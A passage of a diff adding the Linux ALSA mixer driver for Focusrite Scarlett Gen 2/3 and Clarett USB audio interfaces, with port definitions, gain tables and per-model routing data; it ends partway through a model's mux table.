++ * Support for Clarett+ 4Pre and 2Pre added in Sep 2023 (thanks to
++ * Gregory Rozzo for donating a 4Pre, and David Sherwood and Patrice
++ * Peterson for usbmon output).
++ *
++ * Support for Clarett 2Pre and 4Pre USB added in Oct 2023.
++ *
++ * This ALSA mixer gives access to (model-dependent):
++ *  - input, output, mixer-matrix muxes
++ *  - mixer-matrix gain stages
++ *  - gain/volume/mute controls
++ *  - level meters
++ *  - line/inst level, pad, and air controls
++ *  - phantom power, direct monitor, speaker switching, and talkback
++ *    controls
++ *  - disable/enable MSD mode
++ *  - disable/enable standalone mode
++ *
++ * <ditaa>
++ *    /--------------\    18chn            20chn     /--------------\
++ *    | Hardware  in +--+------\    /-------------+--+ ALSA PCM out |
++ *    \--------------/  |      |    |             |  \--------------/
++ *                      |      |    |    /-----\  |
++ *                      |      |    |    |     |  |
++ *                      |      v    v    v     |  |
++ *                      |   +---------------+  |  |
++ *                      |    \ Matrix  Mux /   |  |
++ *                      |     +-----+-----+    |  |
++ *                      |           |          |  |
++ *                      |           |18chn     |  |
++ *                      |           |          |  |
++ *                      |           |     10chn|  |
++ *                      |           v          |  |
++ *                      |     +------------+   |  |
++ *                      |     | Mixer      |   |  |
++ *                      |     |     Matrix |   |  |
++ *                      |     |            |   |  |
++ *                      |     | 18x10 Gain |   |  |
++ *                      |     |   stages   |   |  |
++ *                      |     +-----+------+   |  |
++ *                      |           |          |  |
++ *                      |18chn      |10chn     |  |20chn
++ *                      |           |          |  |
++ *                      |           +----------/  |
++ *                      |           |             |
++ *                      v           v             v
++ *                      ===========================
++ *               +---------------+       +---------------+
++ *                \ Output  Mux /         \ Capture Mux /
++ *                 +---+---+---+           +-----+-----+
++ *                     |   |                     |
++ *                10chn|   |                     |18chn
++ *                     |   |                     |
++ *  /--------------\   |   |                     |   /--------------\
++ *  | S/PDIF, ADAT |<--/   |10chn                \-->| ALSA PCM in  |
++ *  | Hardware out |       |                         \--------------/
++ *  \--------------/       |
++ *                         v
++ *                  +-------------+    Software gain per channel.
++ *                  | Master Gain |<-- 18i20 only: Switch per channel
++ *                  +------+------+    to select HW or SW gain control.
++ *                         |
++ *                         |10chn
++ *  /--------------\       |
++ *  | Analogue     |<------/
++ *  | Hardware out |
++ *  \--------------/
++ * </ditaa>
++ *
++ * Gen 3 devices have a Mass Storage Device (MSD) mode where a small
++ * disk with registration and driver download information is presented
++ * to the host. To access the full functionality of the device without
++ * proprietary software, MSD mode can be disabled by:
++ * - holding down the 48V button for five seconds while powering on
++ *   the device, or
++ * - using this driver and alsamixer to change the "MSD Mode" setting
++ *   to Off and power-cycling the device
++ */
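++
++/* For example, from userspace the MSD switch can be turned off with
++ * amixer (the card number and exact control name may differ; list
++ * the available controls with "amixer -c <card> controls" first):
++ *
++ *   amixer -c <card> cset name='MSD Mode Switch' off
++ *
++ * followed by a power-cycle of the device.
++ */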
++
++#include <linux/slab.h>
++#include <linux/usb.h>
++#include <linux/moduleparam.h>
++
++#include <sound/control.h>
++#include <sound/tlv.h>
++
++#include "usbaudio.h"
++#include "mixer.h"
++#include "helper.h"
++
++#include "mixer_scarlett2.h"
++
++/* device_setup value to allow turning MSD mode back on */
++#define SCARLETT2_MSD_ENABLE 0x02
++
++/* device_setup value to disable this mixer driver */
++#define SCARLETT2_DISABLE 0x04
++
++/* some GUI mixers can't handle negative ctl values */
++#define SCARLETT2_VOLUME_BIAS 127
++
++/* mixer range from -80dB to +6dB in 0.5dB steps */
++#define SCARLETT2_MIXER_MIN_DB -80
++#define SCARLETT2_MIXER_BIAS (-SCARLETT2_MIXER_MIN_DB * 2)
++#define SCARLETT2_MIXER_MAX_DB 6
++#define SCARLETT2_MIXER_MAX_VALUE \
++	((SCARLETT2_MIXER_MAX_DB - SCARLETT2_MIXER_MIN_DB) * 2)
++#define SCARLETT2_MIXER_VALUE_COUNT (SCARLETT2_MIXER_MAX_VALUE + 1)
++
++/* map from (dB + 80) * 2 to mixer value
++ * for dB in 0 .. 172: int(8192 * pow(10, ((dB - 160) / 2 / 20)))
++ */
++static const u16 scarlett2_mixer_values[SCARLETT2_MIXER_VALUE_COUNT] = {
++	0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2,
++	2, 2, 3, 3, 3, 3, 3, 4, 4, 4, 4, 5, 5, 5, 6, 6, 6, 7, 7, 8, 8,
++	9, 9, 10, 10, 11, 12, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21,
++	23, 24, 25, 27, 29, 30, 32, 34, 36, 38, 41, 43, 46, 48, 51,
++	54, 57, 61, 65, 68, 73, 77, 81, 86, 91, 97, 103, 109, 115,
++	122, 129, 137, 145, 154, 163, 173, 183, 194, 205, 217, 230,
++	244, 259, 274, 290, 307, 326, 345, 365, 387, 410, 434, 460,
++	487, 516, 547, 579, 614, 650, 689, 730, 773, 819, 867, 919,
++	973, 1031, 1092, 1157, 1225, 1298, 1375, 1456, 1543, 1634,
++	1731, 1833, 1942, 2057, 2179, 2308, 2445, 2590, 2744, 2906,
++	3078, 3261, 3454, 3659, 3876, 4105, 4349, 4606, 4879, 5168,
++	5475, 5799, 6143, 6507, 6892, 7301, 7733, 8192, 8677, 9191,
++	9736, 10313, 10924, 11571, 12257, 12983, 13752, 14567, 15430,
++	16345
++};
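++
++/* e.g. at index (0 + 80) * 2 = 160 (true 0 dB) the formula gives
++ * int(8192 * pow(10, 0)) = 8192, and at index 172 (+6 dB) it gives
++ * int(8192 * pow(10, 0.3)) = 16345, the last entry above.
++ */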
++
++/* Maximum number of analogue outputs */
++#define SCARLETT2_ANALOGUE_MAX 10
++
++/* Maximum number of level and pad switches */
++#define SCARLETT2_LEVEL_SWITCH_MAX 2
++#define SCARLETT2_PAD_SWITCH_MAX 8
++#define SCARLETT2_AIR_SWITCH_MAX 8
++#define SCARLETT2_PHANTOM_SWITCH_MAX 2
++
++/* Maximum number of inputs to the mixer */
++#define SCARLETT2_INPUT_MIX_MAX 25
++
++/* Maximum number of outputs from the mixer */
++#define SCARLETT2_OUTPUT_MIX_MAX 12
++
++/* Maximum size of the data in the USB mux assignment message:
++ * 20 inputs, 20 outputs, 25 matrix inputs, 12 spare
++ */
++#define SCARLETT2_MUX_MAX 77
++
++/* Maximum number of meters (sum of output port counts) */
++#define SCARLETT2_MAX_METERS 65
++
++/* There are three different sets of configuration parameters across
++ * the devices
++ */
++enum {
++	SCARLETT2_CONFIG_SET_NO_MIXER = 0,
++	SCARLETT2_CONFIG_SET_GEN_2 = 1,
++	SCARLETT2_CONFIG_SET_GEN_3 = 2,
++	SCARLETT2_CONFIG_SET_CLARETT = 3,
++	SCARLETT2_CONFIG_SET_COUNT = 4
++};
++
++/* Hardware port types:
++ * - None (no input to mux)
++ * - Analogue I/O
++ * - S/PDIF I/O
++ * - ADAT I/O
++ * - Mixer I/O
++ * - PCM I/O
++ */
++enum {
++	SCARLETT2_PORT_TYPE_NONE     = 0,
++	SCARLETT2_PORT_TYPE_ANALOGUE = 1,
++	SCARLETT2_PORT_TYPE_SPDIF    = 2,
++	SCARLETT2_PORT_TYPE_ADAT     = 3,
++	SCARLETT2_PORT_TYPE_MIX      = 4,
++	SCARLETT2_PORT_TYPE_PCM      = 5,
++	SCARLETT2_PORT_TYPE_COUNT    = 6,
++};
++
++/* I/O count of each port type kept in struct scarlett2_ports */
++enum {
++	SCARLETT2_PORT_IN    = 0,
++	SCARLETT2_PORT_OUT   = 1,
++	SCARLETT2_PORT_DIRNS = 2,
++};
++
++/* Dim/Mute buttons on the 18i20 */
++enum {
++	SCARLETT2_BUTTON_MUTE    = 0,
++	SCARLETT2_BUTTON_DIM     = 1,
++	SCARLETT2_DIM_MUTE_COUNT = 2,
++};
++
++static const char *const scarlett2_dim_mute_names[SCARLETT2_DIM_MUTE_COUNT] = {
++	"Mute Playback Switch", "Dim Playback Switch"
++};
++
++/* Description of each hardware port type:
++ * - id: hardware ID of this port type
++ * - src_descr: printf format string for mux input selections
++ * - src_num_offset: added to the channel number for the printf
++ * - dst_descr: printf format string for mixer controls
++ */
++struct scarlett2_port {
++	u16 id;
++	const char * const src_descr;
++	int src_num_offset;
++	const char * const dst_descr;
++};
++
++static const struct scarlett2_port scarlett2_ports[SCARLETT2_PORT_TYPE_COUNT] = {
++	[SCARLETT2_PORT_TYPE_NONE] = {
++		.id = 0x000,
++		.src_descr = "Off"
++	},
++	[SCARLETT2_PORT_TYPE_ANALOGUE] = {
++		.id = 0x080,
++		.src_descr = "Analogue %d",
++		.src_num_offset = 1,
++		.dst_descr = "Analogue Output %02d Playback"
++	},
++	[SCARLETT2_PORT_TYPE_SPDIF] = {
++		.id = 0x180,
++		.src_descr = "S/PDIF %d",
++		.src_num_offset = 1,
++		.dst_descr = "S/PDIF Output %d Playback"
++	},
++	[SCARLETT2_PORT_TYPE_ADAT] = {
++		.id = 0x200,
++		.src_descr = "ADAT %d",
++		.src_num_offset = 1,
++		.dst_descr = "ADAT Output %d Playback"
++	},
++	[SCARLETT2_PORT_TYPE_MIX] = {
++		.id = 0x300,
++		.src_descr = "Mix %c",
++		.src_num_offset = 'A',
++		.dst_descr = "Mixer Input %02d Capture"
++	},
++	[SCARLETT2_PORT_TYPE_PCM] = {
++		.id = 0x600,
++		.src_descr = "PCM %d",
++		.src_num_offset = 1,
++		.dst_descr = "PCM %02d Capture"
++	},
++};
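++
++/* e.g. the MIX src_descr "Mix %c" with src_num_offset 'A' yields
++ * source labels "Mix A", "Mix B", ..., while its dst_descr yields
++ * zero-padded control names such as "Mixer Input 01 Capture".
++ */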
++
++/* Number of mux tables: one for each band of sample rates
++ * (44.1/48kHz, 88.2/96kHz, and 176.4/192kHz)
++ */
++#define SCARLETT2_MUX_TABLES 3
++
++/* Maximum number of entries in a mux table */
++#define SCARLETT2_MAX_MUX_ENTRIES 10
++
++/* One entry within mux_assignment defines the port type and range of
++ * ports to add to the set_mux message. The end of the list is marked
++ * with count == 0.
++ */
++struct scarlett2_mux_entry {
++	u8 port_type;
++	u8 start;
++	u8 count;
++};
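++
++/* e.g. { SCARLETT2_PORT_TYPE_PCM, 0, 6 } places six PCM ports,
++ * starting from the first, into the set_mux message; the
++ * { 0, 0, 0 } sentinel (count == 0) ends each table.
++ */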
++
++struct scarlett2_device_info {
++	/* Gen 3 devices have an internal MSD mode switch that needs
++	 * to be disabled in order to access the full functionality of
++	 * the device.
++	 */
++	u8 has_msd_mode;
++
++	/* which set of configuration parameters the device uses */
++	u8 config_set;
++
++	/* line out hw volume is sw controlled */
++	u8 line_out_hw_vol;
++
++	/* support for main/alt speaker switching */
++	u8 has_speaker_switching;
++
++	/* support for talkback microphone */
++	u8 has_talkback;
++
++	/* the number of analogue inputs with a software switchable
++	 * level control that can be set to line or instrument
++	 */
++	u8 level_input_count;
++
++	/* the first input with a level control (0-based) */
++	u8 level_input_first;
++
++	/* the number of analogue inputs with a software switchable
++	 * 10dB pad control
++	 */
++	u8 pad_input_count;
++
++	/* the number of analogue inputs with a software switchable
++	 * "air" control
++	 */
++	u8 air_input_count;
++
++	/* the number of phantom (48V) software switchable controls */
++	u8 phantom_count;
++
++	/* the number of inputs each phantom switch controls */
++	u8 inputs_per_phantom;
++
++	/* the number of direct monitor options
++	 * (0 = none, 1 = mono only, 2 = mono/stereo)
++	 */
++	u8 direct_monitor;
++
++	/* remap analogue outputs; 18i8 Gen 3 has "line 3/4" connected
++	 * internally to the analogue 7/8 outputs
++	 */
++	u8 line_out_remap_enable;
++	u8 line_out_remap[SCARLETT2_ANALOGUE_MAX];
++
++	/* additional description for the line out volume controls */
++	const char * const line_out_descrs[SCARLETT2_ANALOGUE_MAX];
++
++	/* number of sources/destinations of each port type */
++	const int port_count[SCARLETT2_PORT_TYPE_COUNT][SCARLETT2_PORT_DIRNS];
++
++	/* layout/order of the entries in the set_mux message */
++	struct scarlett2_mux_entry mux_assignment[SCARLETT2_MUX_TABLES]
++						 [SCARLETT2_MAX_MUX_ENTRIES];
++};
++
++struct scarlett2_data {
++	struct usb_mixer_interface *mixer;
++	struct mutex usb_mutex; /* prevent sending concurrent USB requests */
++	struct mutex data_mutex; /* lock access to this data */
++	struct delayed_work work;
++	const struct scarlett2_device_info *info;
++	const char *series_name;
++	__u8 bInterfaceNumber;
++	__u8 bEndpointAddress;
++	__u16 wMaxPacketSize;
++	__u8 bInterval;
++	int num_mux_srcs;
++	int num_mux_dsts;
++	u16 scarlett2_seq;
++	u8 sync_updated;
++	u8 vol_updated;
++	u8 input_other_updated;
++	u8 monitor_other_updated;
++	u8 mux_updated;
++	u8 speaker_switching_switched;
++	u8 sync;
++	u8 master_vol;
++	u8 vol[SCARLETT2_ANALOGUE_MAX];
++	u8 vol_sw_hw_switch[SCARLETT2_ANALOGUE_MAX];
++	u8 mute_switch[SCARLETT2_ANALOGUE_MAX];
++	u8 level_switch[SCARLETT2_LEVEL_SWITCH_MAX];
++	u8 pad_switch[SCARLETT2_PAD_SWITCH_MAX];
++	u8 dim_mute[SCARLETT2_DIM_MUTE_COUNT];
++	u8 air_switch[SCARLETT2_AIR_SWITCH_MAX];
++	u8 phantom_switch[SCARLETT2_PHANTOM_SWITCH_MAX];
++	u8 phantom_persistence;
++	u8 direct_monitor_switch;
++	u8 speaker_switching_switch;
++	u8 talkback_switch;
++	u8 talkback_map[SCARLETT2_OUTPUT_MIX_MAX];
++	u8 msd_switch;
++	u8 standalone_switch;
++	struct snd_kcontrol *sync_ctl;
++	struct snd_kcontrol *master_vol_ctl;
++	struct snd_kcontrol *vol_ctls[SCARLETT2_ANALOGUE_MAX];
++	struct snd_kcontrol *sw_hw_ctls[SCARLETT2_ANALOGUE_MAX];
++	struct snd_kcontrol *mute_ctls[SCARLETT2_ANALOGUE_MAX];
++	struct snd_kcontrol *dim_mute_ctls[SCARLETT2_DIM_MUTE_COUNT];
++	struct snd_kcontrol *level_ctls[SCARLETT2_LEVEL_SWITCH_MAX];
++	struct snd_kcontrol *pad_ctls[SCARLETT2_PAD_SWITCH_MAX];
++	struct snd_kcontrol *air_ctls[SCARLETT2_AIR_SWITCH_MAX];
++	struct snd_kcontrol *phantom_ctls[SCARLETT2_PHANTOM_SWITCH_MAX];
++	struct snd_kcontrol *mux_ctls[SCARLETT2_MUX_MAX];
++	struct snd_kcontrol *direct_monitor_ctl;
++	struct snd_kcontrol *speaker_switching_ctl;
++	struct snd_kcontrol *talkback_ctl;
++	u8 mux[SCARLETT2_MUX_MAX];
++	u8 mix[SCARLETT2_INPUT_MIX_MAX * SCARLETT2_OUTPUT_MIX_MAX];
++};
++
++/*** Model-specific data ***/
++
++static const struct scarlett2_device_info s6i6_gen2_info = {
++	.config_set = SCARLETT2_CONFIG_SET_GEN_2,
++	.level_input_count = 2,
++	.pad_input_count = 2,
++
++	.line_out_descrs = {
++		"Headphones 1 L",
++		"Headphones 1 R",
++		"Headphones 2 L",
++		"Headphones 2 R",
++	},
++
++	.port_count = {
++		[SCARLETT2_PORT_TYPE_NONE]     = {  1,  0 },
++		[SCARLETT2_PORT_TYPE_ANALOGUE] = {  4,  4 },
++		[SCARLETT2_PORT_TYPE_SPDIF]    = {  2,  2 },
++		[SCARLETT2_PORT_TYPE_MIX]      = { 10, 18 },
++		[SCARLETT2_PORT_TYPE_PCM]      = {  6,  6 },
++	},
++
++	.mux_assignment = { {
++		{ SCARLETT2_PORT_TYPE_PCM,      0,  6 },
++		{ SCARLETT2_PORT_TYPE_ANALOGUE, 0,  4 },
++		{ SCARLETT2_PORT_TYPE_SPDIF,    0,  2 },
++		{ SCARLETT2_PORT_TYPE_MIX,      0, 18 },
++		{ SCARLETT2_PORT_TYPE_NONE,     0,  8 },
++		{ 0,                            0,  0 },
++	}, {
++		{ SCARLETT2_PORT_TYPE_PCM,      0,  6 },
++		{ SCARLETT2_PORT_TYPE_ANALOGUE, 0,  4 },
++		{ SCARLETT2_PORT_TYPE_SPDIF,    0,  2 },
++		{ SCARLETT2_PORT_TYPE_MIX,      0, 18 },
++		{ SCARLETT2_PORT_TYPE_NONE,     0,  8 },
++		{ 0,                            0,  0 },
++	}, {
++		{ SCARLETT2_PORT_TYPE_PCM,      0,  6 },
++		{ SCARLETT2_PORT_TYPE_ANALOGUE, 0,  4 },
++		{ SCARLETT2_PORT_TYPE_SPDIF,    0,  2 },
++		{ SCARLETT2_PORT_TYPE_MIX,      0, 18 },
++		{ SCARLETT2_PORT_TYPE_NONE,     0,  8 },
++		{ 0,                            0,  0 },
++	} },
++};
++
++static const struct scarlett2_device_info s18i8_gen2_info = {
++	.config_set = SCARLETT2_CONFIG_SET_GEN_2,
++	.level_input_count = 2,
++	.pad_input_count = 4,
++
++	.line_out_descrs = {
++		"Monitor L",
++		"Monitor R",
++		"Headphones 1 L",
++		"Headphones 1 R",
++		"Headphones 2 L",
++		"Headphones 2 R",
++	},
++
++	.port_count = {
++		[SCARLETT2_PORT_TYPE_NONE]     = {  1,  0 },
++		[SCARLETT2_PORT_TYPE_ANALOGUE] = {  8,  6 },
++		[SCARLETT2_PORT_TYPE_SPDIF]    = {  2,  2 },
++		[SCARLETT2_PORT_TYPE_ADAT]     = {  8,  0 },
++		[SCARLETT2_PORT_TYPE_MIX]      = { 10, 18 },
++		[SCARLETT2_PORT_TYPE_PCM]      = {  8, 18 },
++	},
++
++	.mux_assignment = { {
++		{ SCARLETT2_PORT_TYPE_PCM,      0, 18 },
++		{ SCARLETT2_PORT_TYPE_ANALOGUE, 0,  6 },
++		{ SCARLETT2_PORT_TYPE_SPDIF,    0,  2 },
++		{ SCARLETT2_PORT_TYPE_MIX,      0, 18 },
++		{ SCARLETT2_PORT_TYPE_NONE,     0,  8 },
++		{ 0,                            0,  0 },
++	}, {
++		{ SCARLETT2_PORT_TYPE_PCM,      0, 14 },
++		{ SCARLETT2_PORT_TYPE_ANALOGUE, 0,  6 },
++		{ SCARLETT2_PORT_TYPE_SPDIF,    0,  2 },
++		{ SCARLETT2_PORT_TYPE_MIX,      0, 18 },
++		{ SCARLETT2_PORT_TYPE_NONE,     0,  8 },
++		{ 0,                            0,  0 },
++	}, {
++		{ SCARLETT2_PORT_TYPE_PCM,      0, 10 },
++		{ SCARLETT2_PORT_TYPE_ANALOGUE, 0,  6 },
++		{ SCARLETT2_PORT_TYPE_SPDIF,    0,  2 },
++		{ SCARLETT2_PORT_TYPE_MIX,      0, 18 },
++		{ SCARLETT2_PORT_TYPE_NONE,     0,  4 },
++		{ 0,                            0,  0 },
++	} },
++};
++
++static const struct scarlett2_device_info s18i20_gen2_info = {
++	.config_set = SCARLETT2_CONFIG_SET_GEN_2,
++	.line_out_hw_vol = 1,
++
++	.line_out_descrs = {
++		"Monitor L",
++		"Monitor R",
++		NULL,
++		NULL,
++		NULL,
++		NULL,
++		"Headphones 1 L",
++		"Headphones 1 R",
++		"Headphones 2 L",
++		"Headphones 2 R",
++	},
++
++	.port_count = {
++		[SCARLETT2_PORT_TYPE_NONE]     = {  1,  0 },
++		[SCARLETT2_PORT_TYPE_ANALOGUE] = {  8, 10 },
++		[SCARLETT2_PORT_TYPE_SPDIF]    = {  2,  2 },
++		[SCARLETT2_PORT_TYPE_ADAT]     = {  8,  8 },
++		[SCARLETT2_PORT_TYPE_MIX]      = { 10, 18 },
++		[SCARLETT2_PORT_TYPE_PCM]      = { 20, 18 },
++	},
++
++	.mux_assignment = { {
++		{ SCARLETT2_PORT_TYPE_PCM,      0, 18 },
++		{ SCARLETT2_PORT_TYPE_ANALOGUE, 0, 10 },
++		{ SCARLETT2_PORT_TYPE_SPDIF,    0,  2 },
++		{ SCARLETT2_PORT_TYPE_ADAT,     0,  8 },
++		{ SCARLETT2_PORT_TYPE_MIX,      0, 18 },
++		{ SCARLETT2_PORT_TYPE_NONE,     0,  8 },
++		{ 0,                            0,  0 },
++	}, {
++		{ SCARLETT2_PORT_TYPE_PCM,      0, 14 },
++		{ SCARLETT2_PORT_TYPE_ANALOGUE, 0, 10 },
++		{ SCARLETT2_PORT_TYPE_SPDIF,    0,  2 },
++		{ SCARLETT2_PORT_TYPE_ADAT,     0,  4 },
++		{ SCARLETT2_PORT_TYPE_MIX,      0, 18 },
++		{ SCARLETT2_PORT_TYPE_NONE,     0,  8 },
++		{ 0,                            0,  0 },
++	}, {
++		{ SCARLETT2_PORT_TYPE_PCM,      0, 10 },
++		{ SCARLETT2_PORT_TYPE_ANALOGUE, 0, 10 },
++		{ SCARLETT2_PORT_TYPE_SPDIF,    0,  2 },
++		{ SCARLETT2_PORT_TYPE_MIX,      0, 18 },
++		{ SCARLETT2_PORT_TYPE_NONE,     0,  6 },
++		{ 0,                            0,  0 },
++	} },
++};
++
++static const struct scarlett2_device_info solo_gen3_info = {
++	.has_msd_mode = 1,
++	.config_set = SCARLETT2_CONFIG_SET_NO_MIXER,
++	.level_input_count = 1,
++	.level_input_first = 1,
++	.air_input_count = 1,
++	.phantom_count = 1,
++	.inputs_per_phantom = 1,
++	.direct_monitor = 1,
++};
++
++static const struct scarlett2_device_info s2i2_gen3_info = {
++	.has_msd_mode = 1,
++	.config_set = SCARLETT2_CONFIG_SET_NO_MIXER,
++	.level_input_count = 2,
++	.air_input_count = 2,
++	.phantom_count = 1,
++	.inputs_per_phantom = 2,
++	.direct_monitor = 2,
++};
++
++static const struct scarlett2_device_info s4i4_gen3_info = {
++	.has_msd_mode = 1,
++	.config_set = SCARLETT2_CONFIG_SET_GEN_3,
++	.level_input_count = 2,
++	.pad_input_count = 2,
++	.air_input_count = 2,
++	.phantom_count = 1,
++	.inputs_per_phantom = 2,
++
++	.line_out_descrs = {
++		"Monitor L",
++		"Monitor R",
++		"Headphones L",
++		"Headphones R",
++	},
++
++	.port_count = {
++		[SCARLETT2_PORT_TYPE_NONE]     = { 1, 0 },
++		[SCARLETT2_PORT_TYPE_ANALOGUE] = { 4, 4 },
++		[SCARLETT2_PORT_TYPE_MIX]      = { 6, 8 },
++		[SCARLETT2_PORT_TYPE_PCM]      = { 4, 6 },
++	},
++
++	.mux_assignment = { {
++		{ SCARLETT2_PORT_TYPE_PCM,      0,  6 },
++		{ SCARLETT2_PORT_TYPE_ANALOGUE, 0,  4 },
++		{ SCARLETT2_PORT_TYPE_MIX,      0,  8 },
++		{ SCARLETT2_PORT_TYPE_NONE,     0, 16 },
++		{ 0,                            0,  0 },
++	}, {
++		{ SCARLETT2_PORT_TYPE_PCM,      0,  6 },
++		{ SCARLETT2_PORT_TYPE_ANALOGUE, 0,  4 },
++		{ SCARLETT2_PORT_TYPE_MIX,      0,  8 },
++		{ SCARLETT2_PORT_TYPE_NONE,     0, 16 },
++		{ 0,                            0,  0 },
++	}, {
++		{ SCARLETT2_PORT_TYPE_PCM,      0,  6 },
++		{ SCARLETT2_PORT_TYPE_ANALOGUE, 0,  4 },
++		{ SCARLETT2_PORT_TYPE_MIX,      0,  8 },
++		{ SCARLETT2_PORT_TYPE_NONE,     0, 16 },
++		{ 0,                            0,  0 },
++	} },
++};
++
++static const struct scarlett2_device_info s8i6_gen3_info = {
++	.has_msd_mode = 1,
++	.config_set = SCARLETT2_CONFIG_SET_GEN_3,
++	.level_input_count = 2,
++	.pad_input_count = 2,
++	.air_input_count = 2,
++	.phantom_count = 1,
++	.inputs_per_phantom = 2,
++
++	.line_out_descrs = {
++		"Headphones 1 L",
++		"Headphones 1 R",
++		"Headphones 2 L",
++		"Headphones 2 R",
++	},
++
++	.port_count = {
++		[SCARLETT2_PORT_TYPE_NONE]     = { 1,  0 },
++		[SCARLETT2_PORT_TYPE_ANALOGUE] = { 6,  4 },
++		[SCARLETT2_PORT_TYPE_SPDIF]    = { 2,  2 },
++		[SCARLETT2_PORT_TYPE_MIX]      = { 8,  8 },
++		[SCARLETT2_PORT_TYPE_PCM]      = { 6, 10 },
++	},
++
++	.mux_assignment = { {
++		{ SCARLETT2_PORT_TYPE_PCM,      0,  8 },
++		{ SCARLETT2_PORT_TYPE_ANALOGUE, 0,  4 },
++		{ SCARLETT2_PORT_TYPE_SPDIF,    0,  2 },
++		{ SCARLETT2_PORT_TYPE_PCM,      8,  2 },
++		{ SCARLETT2_PORT_TYPE_MIX,      0,  8 },
++		{ SCARLETT2_PORT_TYPE_NONE,     0, 18 },
++		{ 0,                            0,  0 },
++	}, {
++		{ SCARLETT2_PORT_TYPE_PCM,      0,  8 },
++		{ SCARLETT2_PORT_TYPE_ANALOGUE, 0,  4 },
++		{ SCARLETT2_PORT_TYPE_SPDIF,    0,  2 },
++		{ SCARLETT2_PORT_TYPE_PCM,      8,  2 },
++		{ SCARLETT2_PORT_TYPE_MIX,      0,  8 },
++		{ SCARLETT2_PORT_TYPE_NONE,     0, 18 },
++		{ 0,                            0,  0 },
++	}, {
++		{ SCARLETT2_PORT_TYPE_PCM,      0,  8 },
++		{ SCARLETT2_PORT_TYPE_ANALOGUE, 0,  4 },
++		{ SCARLETT2_PORT_TYPE_SPDIF,    0,  2 },
++		{ SCARLETT2_PORT_TYPE_PCM,      8,  2 },
++		{ SCARLETT2_PORT_TYPE_MIX,      0,  8 },
++		{ SCARLETT2_PORT_TYPE_NONE,     0, 18 },
++		{ 0,                            0,  0 },
++	} },
++};
++
++static const struct scarlett2_device_info s18i8_gen3_info = {
++	.has_msd_mode = 1,
++	.config_set = SCARLETT2_CONFIG_SET_GEN_3,
++	.line_out_hw_vol = 1,
++	.has_speaker_switching = 1,
++	.level_input_count = 2,
++	.pad_input_count = 4,
++	.air_input_count = 4,
++	.phantom_count = 2,
++	.inputs_per_phantom = 2,
++
++	.line_out_remap_enable = 1,
++	.line_out_remap = { 0, 1, 6, 7, 2, 3, 4, 5 },
++
++	.line_out_descrs = {
++		"Monitor L",
++		"Monitor R",
++		"Alt Monitor L",
++		"Alt Monitor R",
++		"Headphones 1 L",
++		"Headphones 1 R",
++		"Headphones 2 L",
++		"Headphones 2 R",
++	},
++
++	.port_count = {
++		[SCARLETT2_PORT_TYPE_NONE]     = {  1,  0 },
++		[SCARLETT2_PORT_TYPE_ANALOGUE] = {  8,  8 },
++		[SCARLETT2_PORT_TYPE_SPDIF]    = {  2,  2 },
++		[SCARLETT2_PORT_TYPE_ADAT]     = {  8,  0 },
++		[SCARLETT2_PORT_TYPE_MIX]      = { 10, 20 },
++		[SCARLETT2_PORT_TYPE_PCM]      = {  8, 20 },
++	},
++
++	.mux_assignment = { {
++		{ SCARLETT2_PORT_TYPE_PCM,       0, 10 },
++		{ SCARLETT2_PORT_TYPE_PCM,      12,  8 },
++		{ SCARLETT2_PORT_TYPE_ANALOGUE,  0,  2 },
++		{ SCARLETT2_PORT_TYPE_ANALOGUE,  6,  2 },
++		{ SCARLETT2_PORT_TYPE_ANALOGUE,  2,  4 },
++		{ SCARLETT2_PORT_TYPE_SPDIF,     0,  2 },
++		{ SCARLETT2_PORT_TYPE_PCM,      10,  2 },
++		{ SCARLETT2_PORT_TYPE_MIX,       0, 20 },
++		{ SCARLETT2_PORT_TYPE_NONE,      0, 10 },
++		{ 0,                             0,  0 },
++	}, {
++		{ SCARLETT2_PORT_TYPE_PCM,       0, 10 },
++		{ SCARLETT2_PORT_TYPE_PCM,      12,  4 },
++		{ SCARLETT2_PORT_TYPE_ANALOGUE,  0,  2 },
++		{ SCARLETT2_PORT_TYPE_ANALOGUE,  6,  2 },
++		{ SCARLETT2_PORT_TYPE_ANALOGUE,  2,  4 },
++		{ SCARLETT2_PORT_TYPE_SPDIF,     0,  2 },
++		{ SCARLETT2_PORT_TYPE_PCM,      10,  2 },
++		{ SCARLETT2_PORT_TYPE_MIX,       0, 20 },
++		{ SCARLETT2_PORT_TYPE_NONE,      0, 10 },
++		{ 0,                             0,  0 },
++	}, {
++		{ SCARLETT2_PORT_TYPE_PCM,       0, 10 },
++		{ SCARLETT2_PORT_TYPE_ANALOGUE,  0,  2 },
++		{ SCARLETT2_PORT_TYPE_ANALOGUE,  6,  2 },
++		{ SCARLETT2_PORT_TYPE_ANALOGUE,  2,  4 },
++		{ SCARLETT2_PORT_TYPE_SPDIF,     0,  2 },
++		{ SCARLETT2_PORT_TYPE_MIX,       0, 20 },
++		{ SCARLETT2_PORT_TYPE_NONE,      0, 10 },
++		{ 0,                             0,  0 },
++	} },
++};
++
++static const struct scarlett2_device_info s18i20_gen3_info = {
++	.has_msd_mode = 1,
++	.config_set = SCARLETT2_CONFIG_SET_GEN_3,
++	.line_out_hw_vol = 1,
++	.has_speaker_switching = 1,
++	.has_talkback = 1,
++	.level_input_count = 2,
++	.pad_input_count = 8,
++	.air_input_count = 8,
++	.phantom_count = 2,
++	.inputs_per_phantom = 4,
++
++	.line_out_descrs = {
++		"Monitor 1 L",
++		"Monitor 1 R",
++		"Monitor 2 L",
++		"Monitor 2 R",
++		NULL,
++		NULL,
++		"Headphones 1 L",
++		"Headphones 1 R",
++		"Headphones 2 L",
++		"Headphones 2 R",
++	},
++
++	.port_count = {
++		[SCARLETT2_PORT_TYPE_NONE]     = {  1,  0 },
++		[SCARLETT2_PORT_TYPE_ANALOGUE] = {  9, 10 },
++		[SCARLETT2_PORT_TYPE_SPDIF]    = {  2,  2 },
++		[SCARLETT2_PORT_TYPE_ADAT]     = {  8,  8 },
++		[SCARLETT2_PORT_TYPE_MIX]      = { 12, 25 },
++		[SCARLETT2_PORT_TYPE_PCM]      = { 20, 20 },
++	},
++
++	.mux_assignment = { {
++		{ SCARLETT2_PORT_TYPE_PCM,       0,  8 },
++		{ SCARLETT2_PORT_TYPE_PCM,      10, 10 },
++		{ SCARLETT2_PORT_TYPE_ANALOGUE,  0, 10 },
++		{ SCARLETT2_PORT_TYPE_SPDIF,     0,  2 },
++		{ SCARLETT2_PORT_TYPE_ADAT,      0,  8 },
++		{ SCARLETT2_PORT_TYPE_PCM,       8,  2 },
